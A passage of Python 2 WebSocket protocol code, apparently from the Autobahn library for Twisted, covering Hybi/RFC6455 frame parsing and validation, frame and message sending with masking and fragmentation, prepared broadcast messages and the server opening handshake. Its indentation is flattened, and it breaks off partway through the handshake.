if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
## need minimum of 2 octets to for new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
if frame_payload_len < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.current_frame_masker = XorMaskerSimple(frame_mask)
else:
self.current_frame_masker = XorMaskerShifted1(frame_mask)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
## reprocess when frame has no payload or and buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows to send invalid frames (that is frames invalid
per-se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
It'll wrap within payload, resending parts of that when more octets were requested
The use case is again for fuzzing server which want to sent increasing amounts
of payload data to peers without having to construct potentially large messges
themselfes.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
if l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
masker = XorMaskerSimple(mask)
else:
masker = XorMaskerShifted1(mask)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload a soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note, that this is
an internal method which deliberately allows not send close
frame with invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state == WebSocketProtocol.STATE_CONNECTING:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe:
reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string that when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negoiated which defines semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
if length < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.send_message_frame_masker = XorMaskerSimple(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerShifted1(self.send_message_frame_mask)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
Note that the frame is automatically ended when enough data has been sent
that is, there is no endMessageFrame, since you have begun the frame specifying
the frame length, which implicitly defined the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
## when >0 : frame is still uncomplete and that much amount is still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
You can send text or binary message, and optionally specifiy a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
## explicit payload_frag_size arguments overrides autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
self.initHixie(payload, binary)
self.initHybi(payload, binary, masked)
def initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
elif l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
plm = XorMaskerSimple(mask).process(payload)
else:
plm = XorMaskerShifted1(mask).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
class WebSocketFactory:
"""
Mixin for WebSocketClientFactory and WebSocketServerFactory.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of WebSocketProtocol using sendPreparedMessage().
By doing so, you can avoid the (small) overhead of framing the
_same_ payload into WS messages when that payload is to be sent
out on multiple connections.
Modes: Hybi, Hixie
Caveats:
1) Only use when you know what you are doing. I.e. calling
sendPreparedMessage() on the _same_ protocol instance multiples
times with the same prepared message might break the spec.
Since i.e. the frame mask will be the same!
2) Treat the object returned as opaque. It may change!
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSockets servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!").
When you want to accept the connection, return the accepted protocol
from list of WebSockets (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation _before_ your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation _after_ your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def parseHixie76Key(self, key):
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
def processHandshake(self):
"""
Process WebSockets opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.port:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.port))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.port == 443) or (not self.factory.isSecure and self.factory.port == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.port, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
